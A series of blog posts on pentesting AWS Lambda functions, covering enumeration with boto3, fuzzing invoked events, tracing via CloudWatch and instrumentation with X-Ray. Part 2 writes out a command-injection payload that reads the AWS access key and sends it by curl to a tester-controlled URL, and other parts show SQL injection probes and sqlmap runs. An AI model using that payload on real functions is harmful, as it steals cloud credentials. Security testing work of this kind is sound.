Leveraging tunnelLambda with pentesting tools for serverless function testing

One of the challenges for lambda function testing is to incorporating and integrating traditional effective tools like netcat, burp proxy or sqlmap. These tools runs on HTTP(S) pipes while lambda function's events can be coming from any where without HTTP pipe. Hence, one can leverage tool like tunnelLambda while performing pentesting. It is part of our scanLambda toolkit (Here - http://blog.blueinfy.com/p/blog-page.html).

It is very simple as shown below. It establishes tunnel between your target lambda function and your specific tool on localhost/port.



'tunnelLambda' helps in establishing a tunnel from your shell to a targeted lambda function. It helps in sending HTTP traffic to the selected port, which will automatically tunnel to the test function. Hence, now we can use some standard HTTP tools like netcat, sqlmap, Burp or ZAP to test the lambda function.


Once it is set, the script will listen on the target port for both GET and POST requests as shown below: -



When you make a GET request it will serve a simple HTML page which can be used to interact with the lambda function as shown in the below figure. We can just open the page in a browser, put the event stream and click on "Send" button. It will show the output once it is invoked.



Also, now we can use tools like netcat, burp, sqlmap or any other tool to make a POST request directly. Here is our HTTP request,

$ cat sqltest.txt
POST / HTTP/1.1
Host: localhost:8888
Content-Length: 17

{"name":"john"}


We can push it to netcat,

$ cat sqltest.txt | nc localhost 8888
HTTP/1.0 200 OK
Server: BaseHTTP/0.6 Python/3.6.4
Date: Fri, 07 Sep 2018 03:04:41 GMT
Content-type: application/json

{"id": "1239873"}


We can start running sqlmap as well.

$ python sqlmap.py -r ../sqltest.txt
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.2.9.6#dev}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 08:37:00

[08:37:00] [INFO] parsing HTTP request from '../sqltest.txt'
JSON data found in POST data. Do you want to process it? [Y/n/q] Y
[08:37:05] [INFO] testing connection to the target URL
[08:37:07] [INFO] testing if the target URL content is stable
[08:37:09] [INFO] target URL content is stable
[08:37:09] [INFO] testing if (custom) POST parameter 'JSON name' is dynamic




We need to configure the details in Burp repeater as shown below:

 

Once it is set, we can make the call as shown below:

 

Next, we can simply send the request to intruder and run attacks as shown below:



Hence, this allows us to quickly leverage all popular tools against lambda functions.

Article by Hemil Shah


lambdaScanner - Scan and Secure serverless lambda functions

'lambdaScanner' is a toolkit which has a combination of scripts for performing penetration testing of lambda functions. The scripts available in the toolkit help assessing the lambda functions from a security standpoint. It helps the tester to discover vulnerabilities in deployment as well as code. It aids in checking vulnerabilities like improper permissions, SQL injections, command executions etc. to name a few. This is not an automated scanner, but a toolkit that helps pen-testers to perform the testing of functions, so it needs to be used wisely by crafting customized requests and payloads. The lambda functions are invoked through various events encompassing AWS like S3, DynamoDB, SQS etc. so the scripts in the toolkit are very helpful in evaluating functions as well as directly testing with various sets of payloads. All these scripts are written in python by using boto3 APIs. The toolkit also has a package called 'lambdaProtect' which can be integrated with an existing lambda function to guard both incoming event stream as well as outgoing response.

This toolkit is "in progress/prototype" and would be enhanced with time by an addition of various functionalities.

Here is a diagram, which describes 'lambdaScanner': -

 

For more detail please visit - here

URL - http://blog.blueinfy.com/p/blog-page.html

Lambda Event Assessment and Pentesting – Invoke, Trace and Dissect (Part 3)

In the last two blog posts, we covered an approach of pentesting lambda functions, using DAST and SAST methodologies, by footprinting, enumerating, scanning and tracing lambda functions to discover and verify security vulnerabilities. In this blog post, we will leverage instrumentation/IAST (Interactive Application Security Testing) approach to analyse and test lambda functions. This approach involves analysing the application behaviour at run time and then using DAST for inducing attacks. Also, a combination of DAST, SAST and IAST can be used to get a comprehensive view of the application, even at run time, and then discover and confirm vulnerabilities.

Below is a figure outlining the architecture of an application using lambda functions with sensors added to the code before performing a pentest of the application/lambda functions: -

 

 

Leveraging AWS X-Ray SDK/APIs:

 

X-Ray is a service provided by AWS to analyse the integration of lambda functions and perform debugging across lambda functions and other points of interest by request tracing, exception collection and profiling capabilities. It is described as following on AWS (https://aws.amazon.com/xray/): -

“AWS X-Ray helps developers analyze and debug production, distributed applications, such as those built using a microservices architecture. With X-Ray, you can understand how your application and its underlying services are performing to identify and troubleshoot the root cause of performance issues and errors. X-Ray provides an end-to-end view of requests as they travel through your application, and shows a map of your application’s underlying components. You can use X-Ray to analyze both applications in development and in production, from simple three-tier applications to complex microservices applications consisting of thousands of services.“

This helps in getting a map, but from a pentesting perspective we are more interested in putting hooks and sensors into the lambda code. We can do this using X-Ray SDK (https://docs.aws.amazon.com/xray/latest/devguide/xray-services-lambda.html).

X-Ray Sensors using Python:

 

Let’s try to do it using a python SDK. We can integrate X-Ray into our lambda code base as shown below: -



We can also patch all inherent components, which are supported by X-Ray. As shown in the above figure, we can create a recorder and use a decorator provided by the library with adding a line, before the lambda function, starting with “@”. Once this line is added we can start inserting sensors for fetching runtime information. Let’s add some annotation and metadata: -

 

In the above code, we are defining a sub-segment with an annotation and then using the defined annotation as our sensor. Hence, we can start recording the runtime values before or after interesting the API calls. In the above case, we are recording the "command" variable before it goes to its sub-process. All these interactions will get recorded at runtime by X-Ray services in the logs.

Now, after invoking the function, when we go and see the X-Ray logs (as shown in the below figure) we see the execution time for each function is logged and we see that the function is not calling any other AWS component like S3, DynamoDB, SQS etc.: -

 

In the below figure, we see the "lambda" sub-segment values in the logs according to the defined annotations and sub-segments: -


 We can also see full metadata with the event we pushed in the record as shown below: -

 

In this way, we can inject a payload and see our injected payload go through to initiate a successful command injection after the function is invoked (a detailed process of this was explained in the last blog post).

Instrumentation without AWS X-Ray:

 

Apart from AWS X-Ray, we can also use other available tools for debugging purpose. For example, let’s use the following package (https://github.com/mihneadb/python-execution-trace) to get a runtime variable dump along with the executed code.

The code provided in the package can be modified and added to the lambda function as shown below: -

 

We get its @record and it will print the log to CloudWatch using a simple "print" function.
We can see the following log in our CloudWatch console: -

 

We get a full dump of all the variables with line numbers. Also, we can see how values are changing in runtime line-by-line execution. Hence, it can have much more valuable information for the analysis needed to detect a vulnerability.

Apart for third-party tools that are available we can also define our own decorator function, to record events as well as output, in python, which we can leverage for instrumentation as shown below: -

 

We define a function "instrument", which we can add before our actual lambda function in our python code as shown below: -

 

At the point of execution, we can see these entries in our CloudWatch logs: -

 

In this way, we can add multiple "print" functions in between the code and use something like "locals()" to dump runtime variables as well.

360 Degree – DAST, SAST and IAST

 

We can implement the following strategy to get a 360 degree view of the lambda function.
  1. We can scan the code to identify some interesting API calls which can directly be mapped to vulnerabilities like command injection, SQL injections etc. and monitor those specific calls. (SAST)
  2. We can inject sensors by using AWS X-Ray, at interesting places, before or after the call and record the values going to the API. (IAST)
  3. We can then invoke the lambda function and fuzz the event stream with customized payloads. (DAST)
  4. All the events will be recorded in the logs as per the injected sensors and we will have the data to be analysed. By analysing this data, as well as the output of the invoked functions we will be able to detect and confirm a vulnerability. Moreover, this information would also aid in crafting exploits for the detected vulnerability.

Conclusion:

A most common use case scenario of lambda functions involves asynchronous functions, where there is no output coming back to the tester. This makes vulnerability confirmation difficult for the tester. Thus, IAST/Instrumentation is a very interesting and more or so an imperative approach to pentesting lambda functions. There are multiple tools and approaches that can be deployed for instrumentation. Moreover, a combination of all the three approaches, DAST, SAST and IAST, would save a lot of effort and would help in detecting a vulnerability with much more precision. It would help avoid unnecessary guesswork and focus on identifying pointers, doing a run time analysis, crafting customized payloads with correct test cases and analysing the logs to detect loopholes in the application from a security standpoint.

Article by Amish Shah & Shreeraj Shah

Lambda Event Assessment and Pentesting – Invoke, Trace and Dissect (Part 2)

In the last blog post, we talked about the basic methodology for lambda testing where we covered enumeration, profiling and invocation. We can do a quick fuzzing of the lambda function by passing a set of payloads. Lambda functions can be used to build micro services, which get incorporated into the web applications as part of the architecture. These functions can be called in both synchronous as well as asynchronous manners depending on the architectural requirement. In this blog post, we are going to cover another aspect of testing lambda functions  which mainly compromises of  leveraging CloudWatch logs while performing penetration testing.

Architecture of Application with Lambda:

 

Let’s take a real life scenario as shown in the below figure. In this case, there is a web application (enterprise financial application) that is used from various devices like mobile or computers across the globe. API's are also used to extend the use of the application such that it can be leveraged by third party like suppliers, vendors, customers etc. As shown in the application architecture, various AWS components are used by the web application.


Figure 1 – Invoice Processing System for a Financial Application

Let’s take a simple use case scenario:
  • The users of the application submit an invoice for processing through the web or API where they perform various activities like uploading a file, providing the file name, other basic information etc.
  • The web application in turn calls the lambda function which triggers the activities across the AWS components (Amazon S3 and DynamoDB)
  • Once everything is in place, based on scheduling, the message gets posted to Amazon SQS service for asynchronous processing
  • At some point in time, SQS triggers the second lambda function via queue to process the invoice. This queue provides the invoice file to the lambda function which processes the invoice. It does the needful and gets the task done.
If we look at the threat model for the above components, one of the important areas to check is the asynchronous lambda function, which is processing the SQS message.

Let’s do the testing of that function and see what kind of issues we can discover.

Function Integration with other Services:

We can go ahead and enumerate the function details as mentioned in the last blog post. We get the following response and profile for the function. We get basic information like technology stack, permissions, role, code and mapping.



We can see this function is being integrated to SQS service. Here is its mapping:-

---Function Mapping---
[{'UUID': '5cc9f6a9-2b39-41df-9d09-e7adbf3d9305', 'BatchSize': 10, 'EventSourceArn': 'arn:aws:sqs:us-east-2:313588302550:processInvoice', 'FunctionArn': 'arn:aws:lambda:us-east-2:313588302550:function:processInvoice', 'LastModified': datetime.datetime(2018, 8, 10, 15, 32, 32, 867000, tzinfo=tzlocal()), 'State': 'Disabled', 'StateTransitionReason': 'USER_INITIATED'}]


Hence, we can start injecting messaging or SQS events to this function and see how it responds. Before that let’s take a quick look at the AWS console. Here is the SQS position on the AWS console at a given point in time.



We can look at the log for the lambda function for which the trigger is being set for the queue.
 

We can clearly see the event being fired and the message received and processed by the function.

Testing the Function and Tracing:

We can now directly test the function by supplying various values, which are controlled by the user. Below is a sample of the event body. The “body” is controlled by the user, which makes it an interesting area to fuzz.

{
  "Records": [
    {
      "body": "invoice-98790",
      "receiptHandle": "MessageReceiptHandle",
      "md5OfBody": "7b270e59b47ff90a553787216d55d91d",
      "eventSourceARN": "arn:aws:sqs:us-east-2:123456789012:MyQueue",
      "eventSource": "aws:sqs",
      "awsRegion": "us-east-2",
      "messageId": "19dd0b57-b21e-4ac1-bd88-01bbb068cb78",
      "attributes": {
        "ApproximateFirstReceiveTimestamp": "1523232000001",
        "SenderId": "123456789012",
        "ApproximateReceiveCount": "1",
        "SentTimestamp": "1523232000000"
      },
      "messageAttributes": {}
    }
  ]
}


We can use the following code to invoke the function where the event is taken from the file.

 

We get the following output

(+)Configuring Invoking ...
    (-) Loading event from file ...
    (-) Request Id ==> 9dc6aa67-9f9b-11e8-924a-99f63ade1b6b
    (-) Response ==>
    (-) "Invoice processing done!"


We can use the Request Id to trace the log and see what went behind the scene. Let’s use the following code and enumerate CloudWatch logs for the call.



We can pass on the function name and see the results. We can see the last entries and can compare it with the Request Id. Here is the entry for that Request Id: -

 

We can fuzz stream and try different things here and analyse the responses. For example we pass on the following message: -

{
  "Records": [
    {
      "body": "junkname",
      "receiptHandle": "MessageReceiptHandle",
      "md5OfBody": "7b270e59b47ff90a553787216d55d91d",
      "eventSourceARN": "arn:aws:sqs:us-east-2:123456789012:MyQueue",
      "eventSource": "aws:sqs",
      "awsRegion": "us-east-2",
      "messageId": "19dd0b57-b21e-4ac1-bd88-01bbb068cb78",
      "attributes": {
        "ApproximateFirstReceiveTimestamp": "1523232000001",
        "SenderId": "123456789012",
        "ApproximateReceiveCount": "1",
        "SentTimestamp": "1523232000000"
      },
      "messageAttributes": {}
    }
  ]
}


We invoke the function and see a different response.

(+)Configuring Invoking ...
    (-) Loading event from file ...
    (-) Request Id ==> f9e61f20-9f9d-11e8-99aa-59c2b3fe1ba2
    (-) Response ==>
    (-) "Invoice processing done!"

We can see entries in the log.

 

Looks like it is trying to open the file. Now, we can try using different variations and try to figure out the vulnerability. In the previous legitimate request, we saw a line where it returned file’s content type. Hence, it may be using some underlying OS command to fetch the file content type. We try to do command injection here and see what response we get. Since, we are not getting synchronous response with some message back - we can try injecting following the command: –

Invoice-98790;url='https://API-ID.execute-api.us-east-2.amazonaws.com/listen?dump='$AWS_ACCESS_KEY_ID;curl $url


Here, we are passing the URL and trying to extract the AWS access key. Once it is extracted, we use cURL to send the URL to a different location. We can go and see the logs and see the response since that URL is controlled by us. If the command gets executed successfully then we know it is indeed vulnerable.

Here is the message event we try to inject.

 

We have a listener mock over the target URL. It will collect the information if the command gets successfully executed. Let’s invoke the function and monitor the API logs -

 

Hence, this way the vulnerability is detected. We can see the code and find the following line using standard SAST approach as well.

 

Conclusion:

Lambda function testing is relatively simple when we focus on fuzzing the event and injecting the payload directly through AWS APIs. It is imperative to identify threat points and fuzz with the right payloads at the right place. Some of these events are not synchronous and are triggered in various different ways, so it is not possible to simulate them like an actual event fired from different sources. It is easy to do direct simulation like we did in the above case. Also, there are different data collection points for AWS function - we have covered DAST and SAST in this case. We can leverage IAST/instrumentation via X-Ray or other methods provided by specific languages, which will be covered  in the coming blog post.
Article by Amish Shah & Shreeraj Shah

Lambda Event Assessment and Pentesting – Invoke, Trace and Dissect (Part 1)

Lambda functions are at the core of applications. These functions are invoked, through various events, from various sources like browser, mobile devices or via API calls etc. The events through which the lambda functions are invoked have a pre-defined format for event payloads. The payloads sent via events are eventually consumed by the user-defined code (functions). An attacker, with a malicious intent, can exploit the vulnerable code by poisoning the event payload.

Lambda Function Event Model:


Lambda function can consume one or multiple events over various different streams. It has its own event model with a defined structure as shown in the figure below: -

 Figure – Lambda invocation and access points

As shown in the figure: - the end client interacts with the lambda function through event payloads using channels like HTTP(S), APIs or any other means. It is possible to have asynchronous invocation or polling of events. Hence, there are various possible ways to invoke the function, it all depends on how these functions are being written and exposing entry points. In the above figure, lambda function can be consuming events like SNS, SQS, S3, Kinesis, Lex, Alexa, CloudFront, API Gateway etc. There is a long list of these events. These events would have a pre-defined payload, for example here is an event payload for Amazon SQS.

{
  "queueUrl": "https://sqs.us-east-2.amazonaws.com/123456789012/MyQueue",
  "messages": [
    {
      "body": "Hello ….. message",
      "receiptHandle": "MessageReceiptHandle",
      "md5OfBody": "7b270e59b47ff90a553787216d55d91d",
      "messageId": "19dd0b57-b21e-4ac1-bd88-01bbb068cb78",
      "attributes": {
        "ApproximateFirstReceiveTimestamp": "1523232000001",
        "SenderId": "123456789012",
        "ApproximateReceiveCount": "1",
        "SentTimestamp": "1523232000000"
      },
      "messageAttributes": {}
    }
  ]
}


Hence, we can use these templates for our testing and pass on to the functions at the point of invocation.

Quick Recap on Function Enumeration and Profiling:


In the previous posts we have seen techniques to do function enumeration and profiling. For example: - a simple code like below would list down critical information about the “login” function.



The output for “login” function call is as below: -

 

Methodology for assessing Lambda Functions:


We can start assessing the function with the following techniques in a comprehensive way: -

1.    DAST – we can invoke functions, send across various event payloads and analyse the responses and behaviour which would help in identifying various known vulnerabilities.
2.    SAST – we can fetch the code from Code-Location and try to identify vulnerabilities from the source code itself. It will be a heavy task, depending on the nature and size of the code.
3.    IAST & Logging – we can analyse various logs from Amazon including xRay (Instrumentation SDK of Amazon). Also, one can use this SDK for runtime analysis and collect micro logs.
4.    Deployment Testing – we can analyse deployment of the function using all three above listed testing methodologies; one of the important aspect is to look into the permissions given to users/function.



  
Hence, we can go ahead and do a full 360-degree assessment of the function by utilizing all these techniques to discover possible vulnerabilities.

Let’s look at the possible functions deployed as part of the application: -



As shown in the figure, the function is using SQS, S3 and DynamoDB as a part of application usage. Functions can be invoked over API gateway using HTTP calls. All logs will go to CloudWatch, both from the function as well as APIs. Also, assuming that xRay is enabled on the function, additional logs can be fetched from AWS as well.

Looking at the above structure, we can perform DAST from two points – through API gateway and AWS SDK with limited access to functions. We can directly invoke and fuzz the stream. We can do SAST by fetching code from SDK calls and review the entire code base for the function. Fetching all logs including xRay can be leveraged as part of IAST methodology.

Assessing Function using DAST:


We can start fuzzing and scanning lambda functions by simply invoking the function with a list of payloads. Here is a simple script, which can take various payloads and run them against the function. You can add more values to the “payload” list and fuzz the events. Here we have just passed and filled the event with key-value pairs. You can add any messaging events by using a proper defined structure.


 

We get the following responses back and can see the entire object with messages coming out. The “RequestId” can be noted here, using which various logs can be searched and the request can be traced. We will cover tracing in the next blog post.

 



Moreover, there might be a leak of information sensitive to the application which would be known by analysing the messages displayed to the users in response. Using this information, say for an example a SQL error is seen in the response, one can craft various payloads and exploit the issue if an actual vulnerability exists.

As shown in the enumeration section above, we can get a profile of the lambda functions. From the profile, we can see that the function is mapped to Amazon API Gateway. This information can be leveraged and using the API ID, the function can directly be called over HTTP. This request would pass through the HTTP channel, which would bring the implementation of various mechanisms like WAF into picture as well. Below is a simple way to invoke the function from the browser directly: -

 
We can again analyse responses as well as note the "RequestId", which can further be used to search and trace the request across logs to see different touch points.



Conclusion:


It is quite obvious that one can leverage AWS API directly for testing Lambda functions. A set of test cases and pen test users (with varying access) can be created to conduct thorough testing from a security standpoint. Tests can be run against a list of all functions to check for various attacks ranging from injections to logical bypasses. Though, it is imperative to involve manual intelligence to analyse the behaviour of the functions more closely to identify the correct touch points and security vulnerabilities. Automated techniques can be applied on top of it by leveraging SDK from AWS. Thus, a comprehensive DAST analysis is easy and doable on Lambda functions through penetration testing of these functions. We will look into tracing in the next blog post.

Article by Amish Shah & Shreeraj Shah

Enumerating Lambda functions for Pentesting

Lambda functions can be directly pentested as discussed in the last post. We would like to take it to the next level by illustrating the methodology to automate  pentesting. It is interesting to leverage scripting to automate reviewing Lambda functions from security standpoint. We can use SDK and libraries available in various languages. In this post, we are using python with boto3. More detail and documentation can be found at (https://boto3.readthedocs.io/en/latest/reference/services/lambda.html).

Let’s use a simple sample and run against our target deployment. Before running these scripts, one needs to setup AWS configuration as discussed in the last post. We can run script and use “list_functions” to fetch all functions deployed on the target environment. Here is the list of functions, which are fetched from deployment.

tools $python3 listfunction.py
(+) Lambda functions ...
   (-)pyhello
   (-)login
   (-)hello
   (-)myService-dev-helloworld
   (-)delete
   (-)getuserinfo
   


Here is the code snippet for the function used.

def getFunctions():
    raw_functions = client.list_functions()
    all_functions = raw_functions["Functions"]
    #print(json.dumps(all_functions,indent=1))
    list_of_functions = []
    for i in all_functions:
        list_of_functions.append(i["FunctionName"])
    return list_of_functions


This can be entry point for pentesting. You can uncomment the line where we are using json.dumps. It will give you entire stream for evaluation. Now, we can take each function and start enumerating as shown below. We can start evaluating important parameters and its impact on security.

tools $python3 getFunctionInfo.py login
(+) Fetching Lambda function login...
       (+) Platform: nodejs6.10
       (+) Permission: arn:aws:iam::313588302550:role/service-role/access
       (+) Code-Location: https://awslambda-us-east-2-tasks.s3.us-east-2.amazonaws.com/snapshots/313588302550/login-a1488a4f-………69c59232e73703


In above case, we can fetch important information like platform, permission and code-location to fetch source. We can use “get_function” to fetch detail about function. Here is the code snippet -

target_function = sys.argv[1]
print("(+) Fetching Lambda function "+target_function+"...")
myfunc = client.get_function(FunctionName=target_function)
#print(json.dumps(myfunc,indent=1))
temp = myfunc["Configuration"]
print ("       (+) Platform: "+temp["Runtime"])
print ("       (+) Permission: "+temp["Role"])
temp_code = myfunc["Code"]
print ("       (+) Code-Location: "+temp_code["Location"]+"\n")


In case, if you are interested in seeing the entire object, just use json.dump() and print the object as line commented in both of the above cases.

We can enumerate other mapping information as well, here is the way we can leverage “list_event_source_mappings”.

tools $python3 listmap.py
[{'UUID': '682c8cb8-cb32-4cdc-b059-8f655f71fe07', 'BatchSize': 100, 'EventSourceArn': 'arn:aws:dynamodb:us-east-1:223983707454:table/targetlocations/stream/2018-05-30T09:41:22.995', 'FunctionArn': 'arn:aws:lambda:us-east-1:223983707454:function: targetlocations', 'LastModified': datetime.datetime(2018, 7, 4, 8, 10, tzinfo=tzlocal()), 'LastProcessingResult': 'OK', 'State': 'Enabled', 'StateTransitionReason': 'User action'}]

Here is the code for the same.

myfunc = client.list_event_source_mappings(FunctionName='targetlocations')
temp = myfunc["EventSourceMappings"]
print(temp)

It seems function is using “dynamodb” from ARN.

In next posts, we will go over  invoke and tracing the functions.  

Article by Amish Shah & Shreeraj Shah

Fuzzing Serverless Lambda functions directly

Serverless application (FaaS - Function as a Service) development and use of microservices model are emerging in next generation applications and architecture. It is becoming easier to maintain and cost effective in the days of DevOps era. It is imperative to do a quick testing of these functions from security standpoint and look for common vulnerabilities like injections. Amazon provides Lambda functions for serverless architecture whereas Google and Azure also implemented these types of support and having FaaS in their own portfolio. As shown in the below figure, lambda function is created and deployed on amazon and can be triggered by set of events like HTTP gateway, S3 bucket and number of other events. At the end, the functions are being “invoked” and executed by the end client (Browser, mobile or API users). The challenge from security standpoint is to fuzz these inputs going to functions and identifies any defect in the code via error or behavioural observations (purely DAST approach).


Figure 1 - Lambda invoke and integration

To address the issue of fuzzing, we can leverage AWS client (command-line) directly and interact with functions without going through the actual events as shown in the above diagram. It is possible to test these functions if developer provides right environment along with credentials to the pentester. We can set up AWS client and run some quick tests to discover vulnerabilities and weakness.

One needs to setup AWS client and you can find guideline over here - https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-getting-started.html

First, one needs to setup the access for the environment by given keys from developers as shown below. It is quick process and needs basic detail.

$ aws configure
AWS Access Key ID [None]: …
AWS Secret Access Key [None]: …
Default region name [None]: …
Default output format [None]: …


Once it is set, we can go ahead and enumerate the functions deployed on the server as below by using “list-function” option. It helps in enumerating all functions deployed with some basic information including permissions.



As shown above, we get list of all the functions. Next, we can enumerate the functions in more detail. For example, getting configuration and actual location (code) as shown below.



One can get location of the code by following call, “Location” attribute give the code for review if required.



Now, we can get into the most critical part of the testing. We can invoke the function and start interacting with it as shown below over AWS APIs without actual event. Event can be coming from any source but we are keeping focus on directly testing the function.



In above case, we invoked “login” function with “payload”. We directed out to the file and can see the results.

Now, we can just go ahead and start manipulating “payload” with all different values from DAST/Blackbox standpoint. We can fuzz the payload and start injecting values to discover vulnerabilities within lambda functions.

In a nutshell, it is easy to fuzz lambda functions and test them thoroughly. It is possible to add them into DevOps pipe. AWS client can be used with different languages as well to automate the process. For example following code with python and boto3 client helps in automate fuzzing.

 

Here, we are passing ‘john OR 1=1’ as payload to invoke the function. We are getting following response.

 

We get “Error in fetching value from table” as status message. It implies something to do with SQL injection. Again, we need to dive deep and find exact payload. We can automate the script and start fuzzing the lambda functions.

Article by Amish Shah & Shreeraj Shah